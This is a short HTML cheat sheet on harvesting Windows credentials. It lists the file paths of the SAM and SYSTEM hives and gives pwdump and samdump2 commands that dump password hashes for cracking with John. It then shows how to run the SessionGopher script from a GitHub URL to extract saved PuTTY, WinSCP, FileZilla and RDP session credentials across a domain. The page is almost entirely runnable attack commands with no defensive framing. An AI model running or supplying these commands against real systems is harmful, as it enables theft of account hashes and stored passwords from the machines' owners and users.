<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Windows Passwords</title>
</head><body><b><u>SAM and SYSTEM files</u></b><br/>
<br/>
The Security Account Manager (SAM), often Security Accounts Manager, is a database file. The user passwords are stored in a hashed format in a registry hive either as a LM hash or as a NTLM hash. This file can be found in %SystemRoot%/system32/config/SAM and is mounted on HKLM/SAM.<br/>
<br/>
# Usually %SYSTEMROOT% = C:\Windows<br/>
%SYSTEMROOT%\repair\SAM<br/>
%SYSTEMROOT%\System32\config\RegBack\SAM<br/>
%SYSTEMROOT%\System32\config\SAM<br/>
%SYSTEMROOT%\repair\system<br/>
%SYSTEMROOT%\System32\config\SYSTEM<br/>
%SYSTEMROOT%\System32\config\RegBack\system<br/>
<br/>
<u><b>Generate a hash file for John using pwdump or samdump2.</b></u><br/>
<br/>
pwdump SYSTEM SAM &gt; /root/sam.txt<br/>
samdump2 SYSTEM SAM -o sam.txt<br/>
<br/>
<br/>
<b><u>Passwords stored in services</u></b><br/>
<br/>
Saved session information for PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP using SessionGopher<br/>
<br/>
https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1<br/>
Import-Module path\to\SessionGopher.ps1;<br/>
Invoke-SessionGopher -AllDomain -o<br/>
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss<br/>
<br/>
</body></html>